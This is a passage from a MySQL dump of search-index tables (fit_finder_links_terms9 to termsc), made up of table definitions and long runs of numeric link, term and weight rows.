1.16669),(117,37897,1.05),(117,37898,1.14331),(117,37899,0.95669),(117,37900,1.12),(117,37901,0.88669),(117,37902,0.98),(117,37903,1.02669),(117,37904,1.02669),(117,37905,1.21331),(117,38995,0.18669),(117,38996,0.98),(117,38997,1.07331),(117,38998,0.18669),(117,38999,0.93331),(117,39000,1.09669),(117,39001,0.91),(117,39002,1.00331),(118,39212,0.91),(118,39213,1.00331),(118,39214,1.07331),(118,39215,0.37331),(118,39216,1.05),(118,39217,1.23669),(118,39218,0.98),(118,39219,1.19),(118,39220,0.23331),(118,39221,0.88669),(118,39222,0.98),(118,39223,0.95669),(118,39224,1.12),(118,39225,1.26),(118,39226,0.91),(118,39227,1.05),(118,39228,0.95669),(118,39229,1.12),(118,39230,0.88669),(118,39231,0.98),(118,39232,1.00331),(118,39233,1.33),(118,39731,0.91),(118,39732,1.16669),(118,39733,0.95669),(118,39734,1.07331),(118,39735,0.32669),(118,39736,1.09669),(118,39737,1.16669),(118,39738,0.23331),(118,39739,0.91),(118,39740,0.98),(119,40001,0.88669),(119,40002,0.93331),(119,40003,0.23331),(119,40004,1.00331),(119,40005,1.12),(119,40006,0.84),(119,40007,0.95669),(119,40008,0.88669),(119,40009,0.95669),(119,40010,0.28),(120,40010,0.28),(119,40011,0.98),(119,40012,1.05),(119,40013,1.30676),(119,40014,0.95669),(119,40015,1.12),(119,40016,1.09669),(119,40017,1.23669),(119,40018,0.98),(119,40019,1.09669),(119,40020,0.98),(119,40021,1.07331),(119,40022,0.88669),(119,40023,0.98),(119,40024,0.95669),(119,40025,1.19),(119,40026,0.32669),(119,40027,0.95669),(119,40028,1.07331),(119,40029,0.28),(119,40030,0.98),(119,40031,1.19),(119,40032,0.93331),(119,40033,1.12),(119,40034,0.91),(119,40035,0.95669),(119,40036,0.23331),(119,40037,0.93331),(119,40038,1.00331),(119,40039,0.37331),(119,40040,0.98),(119,40041,1.26),(119,40042,0.98),(119,40043,1.05),(119,40044,0.98),(119,40045,1.16669),(119,40046,0.56),(119,40047,1.82),(119,40048,2.28662),(119,40049,0.23331),(126,40049,0.23331),(119,40050,0.93331),(119,40051,1.12),(119,40052,0.23331),(119,40053,1.05),(119,40054,1.21331),(119,40055,0.32669),(119,40056,1.00331),(119,40057,1.09669),(119,40058,0.95669),(119,40059,0.93331),(119,40060,1.02669),(119,40061,0.84),(119,40062,0.95669),(119,40063,0.93331),(119,40064,0.98),(119,40065,0.88669),(119,40066,1.12),(119,40067,0.84),(119,40068,0.98),(119,40069,0.23331),(119,40070,1.02669),(119,40071,1.14331),(119,40961,1.02669),(119,40962,1.12),(119,40963,0.91),(119,40964,1.05),(119,40965,0.93331),(119,40966,1.07331),(120,41347,0.28),(120,41348,1.02669),(120,41349,1.09669),(120,41350,0.86331),(120,41351,0.95669),(120,41352,0.88669),(120,41353,1.02669),(120,41354,1.05),(120,41355,0.91),(120,41356,1.02669),(120,41357,0.98),(120,41358,1.00331),(120,41359,0.88669),(120,41360,0.95669),(120,41361,1.00331),(120,41362,1.09669),(120,41363,0.93331),(120,41364,1.12),(120,41365,0.51331),(120,41366,1.07331),(120,41367,1.21331),(120,41368,0.88669),(120,41369,1.02669),(120,41370,0.95669),(120,41371,1.05),(120,41372,0.98),(120,41373,1.07331),(120,41374,0.91),(120,41375,1.02669),(120,41376,0.98),(120,41377,1.07331),(120,41378,0.98),(120,41379,1.09669),(120,41380,0.88669),(120,41381,1.02669),(120,41382,0.88669),(120,41383,1.12),(120,41384,0.56007),(120,41385,2.79993),(120,41386,1.00331),(120,41387,1.00331),(120,41388,1.07331),(120,41389,0.65338),(120,41390,1.02669),(120,41391,1.16669),(120,41392,1.07331),(120,41393,1.16669),(120,41394,0.23331),(120,41395,0.98),(120,41396,1.09669),(120,41397,0.23331),(120,41398,1.16669),(120,41399,1.28331),(120,41400,0.93331),(120,41401,0.98),(120,41402,0.93331),(120,41403,1.09669),(120,41404,0.32669),(120,41405,1.09669),(120,41406,1.33),(120,41407,0.91),(120,41408,1.12),(120,41409,0.95669),(120,41410,1.02669),(120,41411,0.32669),(120,41412,1.07331),(120,41413,1.30669),(120,41414,0.86331),(120,41415,1.00331),(120,41416,1.05),(120,41417,1.21331),(120,41418,1.12),(120,41419,1.19),(120,41420,0.98),(120,41421,1.09669),(120,41422,1.07331),(120,41423,1.14331),(120,41424,1.02669),(120,41425,1.21331),(120,41426,1.09669),(120,41427,1.33),(120,41428,1.00331),(120,41429,1.21331),(120,41430,0.91),(120,41431,1.26),(120,41432,0.93331),(120,41433,1.09669),(120,42878,0.91),(120,42879,1.02669),(120,42880,0.86331),(120,42881,0.93331),(120,42882,0.86331),(120,42883,0.93331),(120,42884,0.95669),(120,42885,1.02669),(121,43041,0.14),(121,43042,1.02669),(121,43043,1.07331),(121,43044,0.28),(121,43045,0.93331),(121,43046,1.09669),(121,43047,0.32669),(121,43048,0.95669),(121,43049,1.19),(121,43050,0.46669),(121,43051,0.98),(121,43052,1.26),(121,43053,0.32669),(121,43054,0.91),(121,43055,0.98),(121,43056,0.18669),(121,43057,0.93331),(121,43058,1.12),(121,43059,1.48),(121,43060,0.23331),(121,43061,0.91),(121,43062,1.09669),(121,43063,0.32669),(121,43064,0.93331),(121,43065,1.05),(121,43066,0.28),(121,43067,0.91),(121,43068,1.14331),(121,43464,1.09669),(121,43465,1.4),(121,43466,0.88669),(121,43467,1.05),(121,43468,0.18669),(121,43469,0.95669),(121,43470,1.14331),(121,43476,0.18669),(121,43477,0.88669),(121,43478,0.98),(123,44594,0.86331),(123,44595,0.98),(123,44596,0.28),(123,44597,1.02669),(123,44598,1.19),(123,44599,0.91),(123,44600,1.09669),(123,44601,1.05),(123,44602,1.14331),(123,44603,1.02669),(123,44604,1.19),(123,44605,1.00331),(123,44606,1.09669),(123,44607,1.00331),(123,44608,1.14331),(123,44609,0.28),(123,44610,1.05),(123,44611,1.14331),(123,44612,0.32669),(123,44613,1.16669),(123,44614,1.28331),(123,44615,0.91),(123,44616,1.12),(123,44617,0.88669),(123,44618,1.00331),(123,44619,0.93331),(123,44620,1.05),(123,44621,0.65338),(123,44622,1.02669),(123,44623,1.19),(123,44624,1.26),(123,44625,1.4),(123,44626,1.86662),(123,44627,1.00331),(123,44628,1.02669),(123,44629,0.23331),(123,44630,0.93331),(123,44631,1.12),(123,44632,0.14),(123,44633,0.95669),(123,44634,1.05),(123,44635,0.23331),(123,44636,0.91),(123,44637,1.00331),(123,44638,0.91),(123,44639,1.05),(123,44640,0.14),(123,44641,0.86331),(123,44642,0.98),(123,44643,0.37331),(123,44644,0.98),(123,44645,1.05),(123,44646,2.05338),(123,44647,1.07331),(123,44648,1.26),(123,44649,0.7),(123,44650,1.21331),(123,44651,1.37669),(123,44652,0.88669),(123,44653,1.09669),(123,44654,0.93331),(123,44655,1.23669),(123,44656,1.07331),(123,44657,1.23669),(123,44658,0.91),(123,44659,1.09669),(123,44660,0.95669),(123,44661,1.07331),(123,44662,1.07331),(123,45365,1.05),(123,45366,1.21331),(125,47490,1.02669),(125,47491,1.30669),(125,47492,0.86331),(125,47493,0.95669),(125,47494,0.23331),(125,47495,0.95669),(125,47496,1.05),(125,47497,1.07331),(125,47498,1.26),(125,47499,1.00331),(125,47500,1.16669),(125,47501,0.88669),(125,47502,1.09669),(125,47503,0.88669),(125,47504,0.95669),(125,47505,1.05),(125,47506,0.98),(125,47507,1.05),(125,47508,1.02669),(125,47509,1.21331),(125,47510,0.98),(125,47511,1.07331),(125,47512,1.02669),(125,47513,1.09669),(125,47514,1.00331),(125,47515,1.12),(125,47516,0.86331),(125,47517,0.98),(125,47518,0.88669),(125,47519,1.00331),(125,47520,0.37331),(125,47521,1.02669),(125,47522,1.12),(125,47523,1.00331),(125,47524,1.09669),(125,47525,1.00331),(125,47526,1.35331),(125,47527,1.14331),(125,47528,1.23669),(125,47529,0.88669),(125,47530,1.00331),(125,48175,0.37331),(125,48176,1.05),(125,48177,1.14331),(125,48178,0.95669),(125,48179,1.12),(125,48180,0.32669),(125,48181,0.95669),(125,48182,1.09669),(125,48183,0.28),(125,48184,0.98),(125,48185,1.14331),(125,48186,0.28),(125,48187,0.93331),(125,48188,1.07331),(125,48189,0.37331),(125,48190,1.07331),(125,48191,1.14331),(126,48413,0.37331),(126,48414,1.09669),(126,48415,1.30669),(126,48416,0.84),(126,48417,1.00331),(126,48418,0.95669),(126,48419,1.07331),(126,48420,1.02669),(126,48421,1.14331),(126,48422,0.98),(126,48423,1.05),(126,48424,1.02669),(126,48425,1.09669),(126,48426,1.05),(126,48427,0.28),(126,48428,0.93331),(126,48429,1.12),(126,48430,0.42),(126,48431,1.09669),(126,48432,1.23669),(126,48433,0.28),(126,48434,1.00331),(126,48435,1.09669),(126,48436,0.86331),(126,48437,0.84),(126,48438,0.93331),(126,48439,0.23331),(126,48440,0.88669),(126,48441,1.12),(126,48442,0.91),(126,48443,1.02669),(126,48444,0.23331),(126,48445,0.95669),(126,48446,1.16669),(126,48447,0.95669),(126,48448,1.16669),(126,48449,1.02669),(126,48450,1.12),(126,48451,0.88669),(126,48452,1.09669),(126,48453,0.37331),(126,48454,0.95669),(126,48455,1.12),(126,48456,0.93331),(126,48457,1.05),(126,48458,0.88669),(126,48459,1.02669),(126,48460,0.95669),(126,48461,1.05),(126,48462,0.86331),(126,48463,0.95669),(126,48464,0.98),(126,48465,1.05),(126,48466,0.86331),(126,48467,0.95669),(126,48468,0.84),(126,48469,0.95669),(126,49218,0.32669),(126,49219,1.00331),(126,49220,1.16669),(126,49221,1.00331),(126,49222,1.09669),(126,49223,0.32669),(126,49224,0.98),(126,49225,1.07331),(128,51187,0.86331),(128,51188,1.12),(128,51189,1.14331),(128,51190,0.14),(128,51191,0.88669),(128,51192,1.02669),(128,51193,1.02669),(128,51194,1.16669),(128,51195,0.23331),(128,51196,1.00331),(128,51197,1.16669),(128,51198,0.23331),(128,51199,0.91),(128,51200,1.16669),(128,51201,0.18669),(128,51202,0.98),(128,51203,1.12),(128,51204,1.09669),(128,51205,1.16669),(128,51206,0.93331),(128,51207,1.07331),(128,51208,0.18669),(128,51209,1.00331),(128,51210,1.12),(128,51211,0.81669),(128,51212,1.02669),(128,51213,0.84),(128,51214,0.95669),(128,51215,1.07331),(128,51851,1.00331),(128,51852,1.14331),(128,51853,0.56),(128,51854,1.12),(128,51855,1.23669),(128,51856,0.98),(128,51857,1.14331),(128,51858,0.32669),(128,51859,0.93331),(128,51860,1.07331),(128,51913,0.77),(128,51914,0.86331),(128,51915,0.77),(128,51916,0.81669),(128,51917,0.86331),(128,51918,1.02669),(133,52387,1.12),(133,52388,1.4),(133,52389,1.07331),(133,52390,1.23669),(133,52391,0.88669),(133,52392,0.98),(134,52602,0.37331),(134,52603,1.02669),(134,52604,1.19),(134,52605,1.05),(134,52606,1.14331),(134,52607,1.02669),(134,52608,1.09669); /*!40000 ALTER TABLE `fit_finder_links_terms9` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_termsa` -- DROP TABLE IF EXISTS `fit_finder_links_termsa`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_termsa` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_termsa` -- LOCK TABLES `fit_finder_links_termsa` WRITE; /*!40000 ALTER TABLE `fit_finder_links_termsa` DISABLE KEYS */; INSERT INTO `fit_finder_links_termsa` VALUES (103,11417,0.07),(111,11417,0.14),(112,11417,0.2),(103,15882,0.79331),(103,15883,0.91),(103,15884,0.23331),(103,15885,1.00331),(103,15886,1.09669),(107,22194,0.37338),(107,22195,0.95669),(107,22196,1.02669),(107,22197,0.91),(107,22198,1.02669),(111,29608,0.77),(111,29609,0.98),(111,29610,0.77),(111,29611,0.81669),(120,41115,0.14),(128,41115,0.14),(120,41116,0.88669),(120,41117,1.00331),(120,41118,0.28),(120,41119,0.98),(120,41120,1.19),(123,44474,0.28),(123,44475,1.02669),(123,44476,1.12),(128,51119,0.88669),(128,51120,1.00331); /*!40000 ALTER TABLE `fit_finder_links_termsa` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_termsb` -- DROP TABLE IF EXISTS `fit_finder_links_termsb`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_termsb` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_termsb` -- LOCK TABLES `fit_finder_links_termsb` WRITE; /*!40000 ALTER TABLE `fit_finder_links_termsb` DISABLE KEYS */; INSERT INTO `fit_finder_links_termsb` VALUES (5,404,0.32669),(5,405,1.07331),(5,406,1.26),(35,9482,0.28),(35,9483,0.86331),(35,9484,0.95669),(35,9485,0.88669),(35,9486,1.07331),(35,9487,0.23331),(35,9488,0.95669),(35,9489,1.12),(52,11748,0.04669),(58,11748,0.04669),(110,11748,0.04669),(52,11749,0.65338),(52,11750,0.91),(52,11752,1.35331),(52,11753,1.4),(52,11754,1.4),(52,11755,1.4),(52,11756,1.4),(52,12075,1.05),(52,12200,1.23669),(52,12201,1.4),(55,12420,0.28),(55,12421,1.00331),(55,12422,1.12),(58,12606,0.81669),(58,12607,1.00331),(58,12608,0.32669),(68,13537,0.37331),(116,13537,0.37331),(68,13538,1.09669),(68,13539,1.33),(68,13540,0.84),(68,13541,1.96),(68,13542,1.28331),(68,13543,1.07331),(112,14040,0.23331),(113,14040,0.23331),(126,14040,0.23331),(119,14040,0.69993),(125,14040,0.69993),(113,14043,0.28),(120,14043,0.56),(103,16653,0.18669),(120,16653,0.18669),(103,16654,0.93331),(103,16655,1.00331),(103,16656,0.23331),(105,16656,0.23331),(103,16657,0.95669),(103,16658,1.09669),(103,16659,0.42),(114,16659,0.42),(121,16659,0.42),(111,16659,0.84),(103,16660,1.02669),(103,16661,1.21331),(103,16662,0.46669),(103,16663,1.00331),(103,16664,1.21331),(103,16665,0.0175),(105,16665,0.0175),(111,16665,0.0175),(118,16665,0.0175),(119,16665,0.0175),(123,16665,0.0175),(126,16665,0.0175),(106,16665,0.035),(110,16665,0.035),(112,16665,0.035),(113,16665,0.0525),(103,16666,0.86331),(103,16667,0.93331),(126,16668,0.23331),(128,16668,0.23331),(103,16668,0.46662),(113,16668,0.46662),(103,16669,0.86331),(103,16670,1.14331),(103,16671,0.88669),(103,16672,1.00331),(126,16673,0.18669),(119,16673,0.37338),(120,16673,0.37338),(103,16673,0.56007),(103,16674,0.86331),(103,16675,1.12),(103,16676,0.86331),(103,16677,0.95669),(103,16678,0.93331),(103,16679,1.00331),(103,16680,0.28),(118,16680,0.28),(120,16680,0.56),(103,16681,1.07331),(103,16682,1.23669),(103,16683,0.37331),(103,16684,1.05),(103,16685,1.14331),(104,18567,0.37338),(104,18568,1.86662),(104,18569,1.02669),(104,18570,1.02669),(104,18571,1.12),(104,18572,1.02669),(104,18573,1.19),(104,18574,1.02669),(104,18575,1.09669),(104,18576,0.88669),(104,18577,0.95669),(104,18578,0.95669),(104,18579,1.05),(104,18580,0.32669),(104,18581,0.93331),(104,18582,1.07331),(104,18583,0.09331),(104,18584,0.88669),(104,18585,1.00331),(104,18586,0.14),(117,18586,0.14),(119,18586,0.14),(112,18586,0.56),(104,18587,1.07331),(104,18588,1.16669),(105,19809,0.32669),(112,19809,0.32669),(105,19810,0.93331),(105,19811,1.05),(105,19812,0.23331),(105,19813,0.86331),(105,19814,1.00331),(105,19815,0.91),(105,19816,1.02669),(105,19817,0.91),(105,19818,0.98),(105,19819,0.18669),(110,19819,0.18669),(120,19819,0.18669),(105,19820,0.86331),(105,19821,0.98),(105,19822,0.01169),(118,19822,0.01169),(126,19822,0.01169),(117,19822,0.02338),(107,19822,0.04676),(105,19823,0.81669),(117,19823,0.81669),(107,19823,1.63338),(105,19824,1.00331),(105,19825,0.18669),(118,19825,0.18669),(105,19826,0.91),(105,19827,0.98),(105,19828,0.18669),(119,19828,0.37338),(105,19829,0.86331),(105,19830,1.02669),(105,19831,0.23331),(105,19832,1.02669),(105,19833,1.09669),(105,19834,0.28),(105,19835,0.95669),(105,19836,1.05),(106,19837,0.23331),(112,19837,0.23331),(116,19837,0.23331),(120,19837,0.23331),(105,19837,0.69993),(105,19838,0.91),(105,19839,0.95669),(105,19840,0.95669),(105,19841,1.12),(105,19842,0.95669),(105,19843,1.02669),(105,19844,0.37331),(105,19845,1.02669),(105,19846,1.09669),(105,19847,0.23331),(105,19848,0.91),(105,19849,1.02669),(106,21264,0.74662),(106,21265,1.05),(106,21266,1.21331),(106,21267,1.05),(106,21268,1.21331),(106,21269,1.11993),(106,21270,1.12),(106,21271,1.23669),(106,21272,1.02669),(106,21273,1.19),(106,21274,0.95669),(106,21275,1.05),(106,21276,0.32669),(128,21276,0.32669),(106,21277,1.00331),(106,21278,1.12),(106,21279,0.88669),(106,21280,1.16669),(106,21281,0.91),(106,21282,1.07331),(106,21283,0.18669),(126,21283,0.18669),(110,21283,1.12014),(106,21284,0.88669),(106,21285,0.98),(106,21286,0.28),(106,21287,0.95669),(106,21288,1.07331),(106,21289,0.23331),(106,21290,0.98),(106,21291,1.09669),(106,21292,0.23331),(113,21292,0.46662),(106,21293,0.91),(106,21294,1.05),(106,21295,0.46669),(106,21296,1.14331),(106,21297,1.30669),(106,21298,0.93331),(106,21299,1.00331),(107,22519,0.74662),(107,22520,1.14331),(107,22521,1.33),(107,22522,1.14331),(107,22523,1.33),(107,22524,0.45339),(107,22525,0.32669),(107,22526,0.93331),(107,22527,1.00331),(107,22528,1.58662),(107,22529,1.86662),(107,22530,1.96),(107,22531,0.18669),(120,22531,0.18669),(126,22531,0.37338),(107,22532,0.86331),(107,22533,0.93331),(112,23477,0.32669),(117,23477,0.32669),(128,23477,1.72679),(120,23480,0.88669),(126,23491,0.88669),(119,23491,1.77338),(125,23491,2.66007),(109,24666,0.28),(111,24666,0.56),(109,24667,1.00331),(109,24668,1.07331),(109,24669,0.56),(109,24670,0.95669),(109,24671,1.19),(109,24672,0.93331),(109,24673,1.02669),(109,24674,0.14),(111,24674,0.28),(114,24674,0.28),(109,24675,1.07331),(109,24676,1.23669),(109,24677,0.37331),(109,24678,1.07331),(109,24679,1.16669),(109,24680,0.14),(114,24680,0.42),(111,24680,2.24),(109,24681,0.84),(109,24682,1.05),(109,24683,0.09331),(109,24684,0.84),(109,24685,1.16669),(110,26741,0.93331),(110,26742,1.02669),(110,26743,1.77338),(110,26744,0.95669),(110,26745,0.95669),(110,26746,4.66655),(110,26747,1.14331),(110,26748,1.02669),(110,26749,1.05),(110,26750,1.05),(110,26751,1.00331),(110,26752,1.07331),(110,26753,1.14331),(110,26754,0.88669),(110,26755,1.00331),(110,26756,0.23331),(117,26756,0.23331),(110,26757,0.88669),(110,26758,0.98),(110,26759,0.28),(110,26760,1.00331),(110,26761,1.07331),(110,26762,0.14),(110,26763,1.05),(110,26764,1.28331),(125,26765,0.23331),(126,26765,0.23331),(110,26765,0.46662),(110,26766,1.77338),(110,26767,2.05338),(110,26768,0.37331),(110,26769,0.95669),(110,26770,1.05),(110,26771,0.32669),(112,26771,0.32669),(128,26771,0.32669),(110,26772,1.00331),(110,26773,1.07331),(110,26774,0.37331),(110,26775,0.95669),(110,26776,1.00331),(110,26777,0.37331),(110,26778,0.95669),(110,26779,1.05),(110,26780,0.69993),(110,26781,2.66007),(110,26782,1.16669),(110,26783,1.19),(110,26784,1.02669),(111,30566,0.32669),(111,30567,1.00331),(111,30568,1.16669),(111,30569,0.18669),(111,30570,0.86331),(111,30571,1.05),(111,30572,1.09669),(111,30573,1.28331),(111,30574,1.07331),(111,30575,1.23669),(111,30576,1.05),(111,30577,1.21331),(111,30578,0.91),(111,30579,1.02669),(111,30580,0.46669),(111,30581,1.00331),(111,30582,1.09669),(111,30583,0.32669),(111,30584,0.91),(111,30585,1.28331),(111,30586,0.42),(111,30587,1.02669),(111,30588,1.09669),(111,30589,0.86331),(111,30590,1.05),(111,30591,0.88669),(111,30592,1.07331),(111,30593,0.28),(111,30594,1.00331),(111,30595,1.19),(111,30596,0.32669),(111,30597,0.93331),(111,30598,1.19),(111,30599,0.18669),(111,30600,0.86331),(111,30601,1.02669),(111,30602,0.28),(111,30603,0.91),(111,30604,1.14331),(114,30605,0.98),(111,30605,1.96),(111,30606,2.1),(111,30607,0.32669),(111,30608,1.00331),(111,30609,1.07331),(111,30610,0.84),(111,30611,0.95669),(111,30612,1.02669),(111,30613,1.12),(111,30614,2.45007),(111,30615,1.05),(111,30616,0.95669),(111,30617,0.91),(111,30618,0.93331),(111,30619,1.00331),(111,30620,0.84),(114,30620,0.84),(111,30621,1.02669),(111,30622,0.84),(111,30623,0.93331),(111,30624,0.84),(111,30625,1.02669),(111,30626,1.00331),(111,30627,1.21331),(111,30628,0.88669),(111,30629,1.14331),(111,30630,0.86331),(111,30631,1.09669),(111,30632,0.93331),(111,30633,1.14331),(111,30634,0.84),(111,30635,1.07331),(111,30636,0.98),(111,30637,0.91),(111,30638,1.14331),(111,30639,1.68),(111,30640,0.91),(111,30641,1.05),(111,30642,0.93331),(111,30643,1.07331),(111,30644,1.00331),(111,30645,1.14331),(111,30646,1.02669),(111,30647,1.09669),(111,30648,2.05338),(111,30649,1.28331),(111,30650,1.19),(111,30651,0.84),(111,30652,1.14331),(111,30653,1.33),(111,30654,1.14331),(111,30655,1.23669),(111,30656,0.95669),(111,30657,1.00331),(111,30658,0.51331),(111,30659,1.09669),(111,30660,1.16669),(111,30661,0.28),(111,30662,0.95669),(111,30663,1.23669),(111,30664,0.84),(111,30665,0.88669),(111,30666,0.95669),(111,30667,1.02669),(111,30668,1.09669),(111,30669,0.93331),(111,30670,1.05),(111,30671,0.37331),(111,30672,1.02669),(111,30673,1.19),(111,30674,0.28),(111,30675,0.91),(111,30676,1.00331),(112,32674,0.95669),(112,32675,1.12),(112,32676,0.95669),(112,32677,1.07331),(112,32678,0.84),(118,32678,0.84),(112,32679,0.95669),(112,32680,1.05),(112,32681,1.12),(112,32682,0.23331),(112,32683,1.09669),(112,32684,0.23331),(112,32685,0.93331),(112,32686,1.14331),(112,32687,0.28),(112,32688,1.09669),(112,32689,1.21331),(112,32690,0.93331),(112,32691,1.02669),(112,32692,0.93331),(112,32693,1.02669),(112,32694,0.88669),(112,32695,0.95669),(112,32696,0.84),(112,32697,0.98),(112,32698,0.84),(112,32699,1.00331),(112,32700,1.09669),(112,32701,1.02669),(112,32702,1.16669),(112,32703,0.95669),(112,32704,1.02669),(112,32705,1.05),(112,32706,1.12),(112,32707,0.14),(112,32708,0.84),(112,32709,1.00331),(112,32710,0.14),(112,32711,0.91),(112,32712,0.98),(113,33946,0.88669),(113,33947,1.02669),(113,33948,0.84),(113,33949,0.95669),(113,33950,1.00331),(113,33951,1.19),(113,33952,0.98),(113,33953,1.07331),(113,33954,1.05),(113,33955,1.19),(113,33956,0.93331),(113,33957,1.05),(113,33958,0.98),(113,33959,1.21331),(113,33960,0.95669),(113,33961,1.07331),(113,33962,0.32669),(128,33962,0.32669),(113,33963,1.12),(113,33964,1.26),(113,33965,0.88669),(113,33966,1.07331),(114,35457,1.05),(114,35458,1.28331),(114,35459,0.42),(114,35460,1.33),(114,35461,1.4),(114,35462,1.05),(114,35463,0.98),(114,35464,1.16669),(114,35465,0.98),(114,35466,0.95669),(114,35467,1.19),(114,35468,0.91),(114,35469,1.16669),(114,35470,0.23331),(114,35471,0.88669),(114,35472,1.00331),(116,37254,1.09669),(116,37255,1.28331),(116,37256,0.37338),(116,37257,1.96),(116,37258,1.21331),(116,37259,1.14331),(116,37260,0.18669),(116,37261,0.91),(116,37262,1.09669),(117,37263,0.23331),(116,37263,0.46662),(116,37264,0.93331),(116,37265,1.16669),(116,37266,0.95669),(116,37267,1.16669),(116,37268,0.91),(116,37269,0.98),(117,38147,0.28),(117,38148,0.88669),(117,38149,0.93331),(117,38150,0.86331),(117,38151,0.93331),(117,38152,1.00331),(117,38153,1.12),(117,38154,0.56),(117,38155,1.00331),(117,38156,1.09669),(117,38157,0.93331),(117,38158,1.05),(117,38159,0.32669),(117,38160,0.95669),(117,38161,1.12),(117,38162,0.93331),(117,38163,1.09669),(117,38164,0.32669),(117,38165,1.05),(117,38166,1.14331),(117,38167,0.86331),(117,38168,1.02669),(117,38169,0.93331),(117,38170,0.98),(117,38171,1.02669),(117,38172,0.91),(117,38173,1.02669),(118,39341,0.23331),(118,39342,1.05),(118,39343,1.30669),(118,39344,0.93331),(118,39345,0.32669),(118,39346,1.02669),(118,39347,1.23669),(118,39348,0.84),(118,39349,1.05),(118,39350,0.86331),(118,39351,1.05),(118,39352,0.98),(118,39353,1.05),(119,40280,0.18669),(119,40281,0.98),(119,40282,1.05),(119,40283,0.18669),(119,40284,1.00331),(119,40285,1.07331),(119,40286,0.32669),(119,40287,1.02669),(119,40288,1.09669),(119,40289,0.95669),(126,40289,0.95669),(119,40290,1.19),(126,40290,1.19),(125,40291,0.18669),(119,40291,0.37338),(119,40292,1.82),(119,40293,0.95669),(119,40294,1.05),(119,40295,1.16669),(119,40296,1.26),(119,40297,1.00331),(119,40298,1.00331),(119,40299,1.86662),(119,40300,1.12),(119,40301,1.05),(119,40302,0.95669),(119,40303,1.12),(119,40304,0.93331),(119,40305,1.02669),(119,40306,0.84),(119,40307,0.93331),(119,40308,0.98007),(119,40309,1.12),(119,40310,1.23669),(119,40311,0.93331),(119,40312,1.02669),(119,40313,0.98),(119,40314,1.07331),(119,40315,0.23331),(119,40316,0.91),(119,40317,1.02669),(120,41784,0.88669),(120,41785,0.93331),(120,41786,2.56641),(120,41787,1.02669),(120,41788,1.12),(120,41789,0.88669),(120,41790,1.09669),(120,41791,0.95669),(120,41792,1.02669),(120,41793,2.66007),(120,41794,1.05),(120,41795,1.00331),(120,41796,0.98),(120,41797,0.93331),(120,41798,1.09669),(120,41799,0.95669),(120,41800,1.00331),(120,41801,0.88669),(120,41802,1.00331),(120,41803,1.86662),(120,41804,1.00331),(120,41805,1.05),(120,41806,0.37331),(120,41807,0.98),(120,41808,1.09669),(120,41809,0.09331),(120,41810,0.86331),(120,41811,0.93331),(120,41812,1.05),(120,41813,0.86331),(120,41814,0.95669),(120,41815,0.93331),(120,41816,1.00331),(120,41817,0.98),(120,41818,1.07331),(120,41819,0.91),(120,41820,1.00331),(120,41821,0.93331),(120,41822,1.00331),(120,41823,0.42),(120,41824,1.09669),(120,41825,1.28331),(120,41826,0.93331),(120,41827,1.07331),(120,41828,0.23331),(134,41828,0.23331),(120,41829,0.93331),(120,41830,1.16669),(120,41831,0.18669),(120,41832,0.91),(120,41833,0.95669),(120,41834,1.02669),(120,41835,1.12),(120,41836,1.00331),(120,41837,1.12),(121,43201,1.00331),(121,43202,1.21331),(121,43203,0.32669),(121,43204,0.91),(121,43205,1.28331),(121,43206,0.37331),(121,43207,0.95669),(121,43208,1.07331),(121,43209,0.32669),(121,43210,1.07331),(121,43211,1.14331),(123,44827,0.46669),(123,44828,1.12),(123,44829,1.26),(123,44830,0.88669),(123,44831,1.05),(123,44832,0.42),(123,44833,1.09669),(123,44834,1.21331),(123,44835,0.23331),(123,44836,0.91),(123,44837,1.02669),(123,44838,0.42),(123,44839,1.05),(123,44840,1.12),(123,44841,0.18669),(123,44842,0.91),(123,44843,1.00331),(125,47689,0.91),(125,47690,0.95669),(125,47691,0.95669),(125,47692,0.95669),(125,47693,1.00331),(125,47694,0.91),(125,47695,1.00331),(125,47696,0.37331),(125,47697,0.93331),(125,47698,1.02669),(125,47699,0.23331),(125,47700,1.00331),(125,47701,1.09669),(125,47702,0.32669),(125,47703,0.93331),(125,47704,1.07331),(126,48637,0.14),(126,48638,0.88669),(126,48639,1.02669),(126,48640,0.86331),(126,48641,0.93331),(126,48642,0.95669),(126,48643,1.12),(126,48644,0.86331),(126,48645,1.02669),(126,48646,0.86331),(126,48647,0.98),(126,48648,0.93331),(126,48649,1.02669),(126,48650,0.98),(126,48651,0.18669),(126,48652,0.93331),(126,48653,1.00331),(126,48654,1.00331),(126,48655,1.16669),(126,48656,0.95669),(126,48657,1.02669),(126,48658,0.93338),(126,48659,1.09669),(126,48660,1.16669),(126,48661,1.09669),(126,48662,1.23669),(126,48663,0.18669),(126,48664,0.91),(126,48665,0.98),(126,48666,0.18669),(126,48667,0.98),(126,48668,1.09669),(128,51367,0.42),(128,51368,1.05),(128,51369,1.21331),(128,51370,1.00331),(128,51371,1.09669),(128,51372,5.55),(128,51373,0.95669),(128,51374,1.12),(128,51375,1.07331),(128,51376,1.26),(128,51377,0.98),(128,51378,1.07331),(133,52451,0.18669),(133,52452,0.95669),(133,52453,1.07331),(134,52642,1.02669),(134,52643,1.07331); /*!40000 ALTER TABLE `fit_finder_links_termsb` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_termsc` -- DROP TABLE IF EXISTS `fit_finder_links_termsc`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_termsc` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY 